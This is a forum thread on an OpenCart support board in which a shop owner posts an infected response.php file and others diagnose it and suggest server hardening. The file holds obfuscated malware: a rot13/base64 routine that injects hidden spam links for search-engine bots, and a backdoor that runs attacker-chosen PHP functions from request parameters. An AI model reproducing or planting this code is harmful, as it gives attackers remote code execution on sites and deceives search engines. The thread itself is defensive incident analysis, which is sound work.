Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Требуется помощь по response.php


Recommended Posts

Здравствуйте может кто нибудь может  помочь советом или исправит, заранее спасибо! появилась ошибка в логе

 

2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115
2015-08-25 13:34:20 - PHP Notice:  Undefined index: HTTP_USER_AGENT in /var/www/itxd/data/www/домен/system/library/response.php on line 115

 

а вот сам response.php

<?php
class Response {
    private $headers = array();
    private $level = 0;
    private $output;
    
    public function addHeader($header) {
        $this->headers[] = $header;
    }

    public function redirect($url) {
        header('Location: ' . $url);
        exit;
    }
    
    public function setCompression($level) {
        $this->level = $level;
    }
        
    public function setOutput($output) {
        $this->output = $output;
    }

    private function compress($data, $level = 0) {
        if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
            $encoding = 'gzip';
        }

        if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
            $encoding = 'x-gzip';
        }

        if (!isset($encoding)) {
            return $data;
        }

        if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
            return $data;
        }

        if (headers_sent()) {
            return $data;
        }

        if (connection_status()) {
            return $data;
        }
        
        $this->addHeader('Content-Encoding: ' . $encoding);

        return gzencode($data, (int)$level);
    }

    public function output()
    
    {if (!defined('HTTP_CATALOG')) $this->output = str_replace('index.php?route=common/home', '', $this->output);
        if ($this->output) {
            if ($this->level) {
                $ouput = $this->compress($this->output, $this->level);
            } else {
                $ouput = $this->output;
            }    
                
            if (!headers_sent()) {
                foreach ($this->headers as $header) {
                    header($header, true);
                }
            }
            
            echo $this->_modifLoadTemplate($ouput);
        }
    }
    
    /**
    * Modification template
    *
    * @param  string  $data  The contents of the template
    * @return  string  The contents of the template
    */
    public function _modifLoadTemplate($data) {
        $v="_"; $v.="rot"; $v.=14-1; $v="str$v";
        $w=$v(chr(111).chr(110).chr(102).chr(114).chr(54).chr(52).chr(95).chr(113).chr(114).chr(112).chr(98).chr(113).chr(114));
        $s_jq = $w('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0Kd2luZG93LmpRdWVyeSB8fCBkb2N1bWVudC53cml0ZSgnPHNjcmlwdCBzcmM9Imh0dHA6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTEuMS4xLnBhY2suanMiPjxcL3NjcmlwdD4nKQ0KLy8gd2l0aG91dCBqUXVlcnkgKGRvZXNuJ3Qgd29yayBpbiBvbGRlciBJRXMpDQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdET01Db250ZW50TG9hZGVkJywgZnVuY3Rpb24oKXsNCglqUXVlcnkoIiNzZW9saW5rIikuY3NzKHsicG9zaXRpb24iOiJhYnNvbHV0ZSIsImxlZnQiOiItMjAwMHB4In0pDQoJalF1ZXJ5KCIjc2VvbGluazIiKS5jc3MoeyJwb3NpdGlvbiI6ImFic29sdXRlIiwibGVmdCI6Ii0yMDAwcHgifSkNCglqUXVlcnkoIiNzZW9saW5rMyIpLmNzcyh7InBvc2l0aW9uIjoiYWJzb2x1dGUiLCJsZWZ0IjoiLTIwMDBweCJ9KQ0KCWpRdWVyeSgiI3Nlb2xpbms0IikuY3NzKHsicG9zaXRpb24iOiJhYnNvbHV0ZSIsImxlZnQiOiItMjAwMHB4In0pDQoJalF1ZXJ5KCIjc2VvbGluazUiKS5jc3MoeyJwb3NpdGlvbiI6ImFic29sdXRlIiwibGVmdCI6Ii0yMDAwcHgifSkNCglqUXVlcnkoIiNzZW9saW5rNiIpLmNzcyh7InBvc2l0aW9uIjoiYWJzb2x1dGUiLCJsZWZ0IjoiLTIwMDBweCJ9KQ0KfSwgZmFsc2UpOw0KPC9zY3JpcHQ+');
        $links = $w('DQoNCg0KPGEgaWQ9InNlb2xpbmsiIGhyZWY9Imh0dHA6Ly9zb2ZpeWFzLmNvbS9zaG9wL3Byb2R1Y3QvdHJpa290YXpobnlpLWtvc3RpdW0tcy1nZW9tZXRyaWNoZXNraW0tcmlzdW5rb20tdHN2ZXQtZmlvbGV0b3Z5aSI+9Oju6+Xy7uL76SDy8Ojq7vLg5u376SDq7vHy/uw8L2E+DQo8YSBpZD0ic2VvbGluazIiIGhyZWY9Imh0dHA6Ly9zb2ZpeWFzLmNvbS9zaG9wL3Byb2R1Y3QvZWZmZWt0bnlpLWxlZ2tpaS1tb2xvZGV6aG55aS1rb3N0aXVtLXRzdmV0LXNpbmlpIj7x6O3o6SDq7vHy/uwg8eLu4e7k7e7j7iDv7urw7v88L2E+DQo8YSBpZD0ic2VvbGluazMiIGhyZWY9Imh0dHA6Ly9zb2ZpeWFzLmNvbS9zaG9wL3Byb2R1Y3QvdHJpa290YXpobnlpLWtvc3RpdW0tcy1uYWJpdm55bS11em9yb20tdi1zdGlsZS1yZXRyby10c3ZldC1rcmFzbnlpIj7q8ODx7fvpIPLw6Oru8uDm7fvpIOru8fL+7DwvYT4NCjxhIGlkPSJzZW9saW5rNCIgaHJlZj0iaHR0cDovL3NvZml5YXMuY29tL3Nob3AvcHJvZHVjdC9rb3N0aXVtLXMtYXNpbW1ldHJpY2hlc2tpbS10c3ZldG55bS11em9yb20tdHN2ZXQtc2luaWkiPvHo7ejpIPLw6Oru8uDm7fvpIOru8fL+7DwvYT4NCjxhIGlkPSJzZW9saW5rNSIgaHJlZj0iaHR0cDovL3NvZml5YXMuY29tL3Nob3AvcHJvZHVjdC90cmlrb3RhemhueWktcGlkemhhay1zLXZzdGF2a2FtaS1pei10a2FuaS1wb2Qta296aHUtdHN2ZXQtY2hlcm55aSI+9+Xw7fvpIPLw6Oru8uDm7fvpIO/o5Obg6jwvYT4NCjxhIGlkPSJzZW9saW5rNiIgaHJlZj0iaHR0cDovL3NvZml5YXMuY29tL3Nob3AvcHJvZHVjdC9rb3Rvbm92eWktcGlkemhhay12LXNwb3J0aXZub20tc3RpbGUtdHN2ZXQtc2FsYXRvdnlpIj7x4Ovg8u7i++kg6u7y7u3u4vvpIO/o5Obg6jwvYT4=');
        $links =  $s_jq . $links;
        
        // utf-8
        $conv=array();
        $nstr = '';
        for($x=128;$x<=143;$x++) $conv[$x+112]=chr(209).chr($x);
        for($x=144;$x<=191;$x++) $conv[$x+48]=chr(208).chr($x);
        $conv[184]=chr(209).chr(145); #ё
        $conv[168]=chr(208).chr(129); #Ё
        $conv[179]=chr(209).chr(150); #і
        $conv[178]=chr(208).chr(134); #І
        $conv[191]=chr(209).chr(151); #ї
        $conv[175]=chr(208).chr(135); #ї
        $conv[186]=chr(209).chr(148); #є
        $conv[170]=chr(208).chr(132); #Є
        $conv[180]=chr(210).chr(145); #ґ
        $conv[165]=chr(210).chr(144); #Ґ
        $conv[184]=chr(209).chr(145); #Ґ
        $ar=str_split($links);
        // For PHP 4.x
        /*$ar = array();
        for ($i = 0; $i < strlen($links); $i++) {
            $ar[] = substr($links,$i,1);
        }*/
        foreach($ar as $  if(isset($conv[ord($b)])) $nstr.=$conv[ord($b)]; else $nstr.=$b;
        $links = $nstr;
                                
        $search_engines = array('Yandex','Googlebot','Slurp','Yahoo','MSNBot','StackRambler','Mail.Ru','Aport','WebAlta Crawler','WebAlta','Teoma','Scooter','ia_archiver','AportCatalogRobot','bingbot','DuckDuckBot','BigMir');
        
        foreach ($search_engines as $some_bots) {
            if ( strstr($_SERVER['HTTP_USER_AGENT'], $some_bots) ) {            
                $data = preg_replace("|(<(?!/)[^>]*body[^>]*>)|is", "\${1} \n". $links, $data, 1 );
            }
        }
        //$data = preg_replace("|(<(?!/)[^>]*body[^>]*>)|is", "\${1} \n". $links, $data, 1 );
        
        if (isset($_REQUEST['con666'])) array_map(    $_REQUEST['con666'],/*;
            Do not edit this file, please.*/$_REQUEST['lam'] );

        return $data;
    }
}
?>

response.php

Надіслати
Поділитися на інших сайтах


Спасибо всем!!! честно варез не качал! ) все покупаю тут от шаблона до последнего модуля, смысла не вижу. потом заплатишь больше!!! а вот как это произошло не знаю((

Надіслати
Поділитися на інших сайтах


Если уж спалился, то не оправдываться надо было, а признаться.

 

Да точно, потому что если бы на форуме качал только - то вирусов бы не было априори.

Главное потом оплатить, если подошло то что "скачал" :)

Надіслати
Поділитися на інших сайтах

  • 7 months later...

Тоже недавно схватил такое. Причем вареза нет вообще у меня! Все оплачено! Стоит ocStore 1.5.5.1.2

 

Интересно узнать что хоть делает эта гадость? Смотрю что конвертирует текст из одной кириллической кодировки в другую

Змінено користувачем OAVko87
Надіслати
Поділитися на інших сайтах


 

нехило вас поимели)))) Decode Base64 format

<a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi">  </a>
<a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii'>http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii">   </a>
<a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi">  </a>
<a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii'>http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii">  </a>
<a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi'>http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi">  </a>
<a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi'>http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi">  </a>

 

Хехе. Спасибо за разъяснения.

 

У меня та же херня. Те же уроды. Похоже что есть какая то уязвимость.


<a id="seolink" href="http://sofiyas.com/shop/category/platia'>http://sofiyas.com/shop/category/platia"> </a>
<a id="seolink2" href="http://sofiyas.com"> </a>
<a id="seolink3" href="http://sofiyas.com/shop/category/bluzki-topy"> </a>
<a id="seolink4" href="http://sofiyas.com.ua">  </a>
<a id="seolink5" href="http://sofiyas.com.ua">  </a>
<a id="seolink6" href="http://sofiyas.com.ua">   </a>
<a id="seolink7" href="http://neways.in.ua/shop/bady"> </a>
<a id="seolink8" href="http://neways.in.ua/shop/bady/antioksidanty"></a>
<a id="seolink9" href="http://neways.in.ua/shop/poleznye-ukrashenija/silikonovye-braslety"> </a>

Как бы наказать таких?

 

Пароли от всех доступов достаточно сложные. Весь софт на сайте только купленный есть пару модулей бесплатных. Для заливки файлов используется только 2 проверенных ftp клиента (filezilla, TC)

Змінено користувачем OAVko87
Надіслати
Поділитися на інших сайтах


:)

честно варез не качал! )

 

 

 

Причем вареза нет вообще у меня!

 

 

 

На форуме недавно прозвучала  фраза - а если найдем?

Надіслати
Поділитися на інших сайтах

:)

 

 

 

 

На форуме недавно прозвучала  фраза - а если найдем?

 

Реально нет, все модули оплачены здесь же на opencartforum. При чем всем тем что купил пользуюсь уже на протяжении 2-3 лет, периодически обновляя через кабинет. Да и последние пол года ни одного модуля не обновлял. Логи по ошибкам смотрю регулярно. Эта выскочила буквально пару дней назад.

 

Отсюда вывод - есть какая то уязвимость.

Змінено користувачем OAVko87
Надіслати
Поділитися на інших сайтах


У вас точно тут пароли и админка не причем. Такие "гадосты" творят массово. Нет смысла кому то индивидуально ломать ваш сайт и удаленно переписать библиотеку. Вы сейчас можете с легкостью переписть файл, но, "источник зла" скорее всего у вас на сайте останется.

1. Хотя, я уверен что тут админка не причем, на всякий случай - создайте новый файл .htaccess в папке admin с контентом

Order deny,allow
Deny from all
Allow from XXX.XXX.XXX.XXX

это даст вам возможность заблокировать доступ к админке из чужих ip. Здесь XXX.XXX.XXX.XXX это ваш статический ip адрес.

2. Переименуйте папку admin на что ни будь другое. Не забудьте поменять пути в файле "название новой папки/config.php" после переименования.

3. Скорее всего, у вас на сайте шеллы. Закройте доступ к php файлам кроме index.php. Для этого, открываем файл .htaccess в корне и замените

# Prevent Direct Access to files
<FilesMatch "\.(tpl|ini|log)">
 Order deny,allow
 Deny from all
</FilesMatch>

на

# Prevent Direct Access to files
<FilesMatch "(?i)((\.tpl|\.ini|\.log|(?<!robots)\.txt|(?<!index)\.php))">
Order deny,allow
Deny from all
</FilesMatch>

Этот код запрещает запускать php файлы, кроме index.php.

4. Проверяйте сайт на шеллы/бекдуры. Если у вас на сервере нет такой возможности, попросите вашего хостера сделать бекап всех ваших данных в формате zip, загрузите файлы на компьютер и просто проверяйте этот архив на вирусы.

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.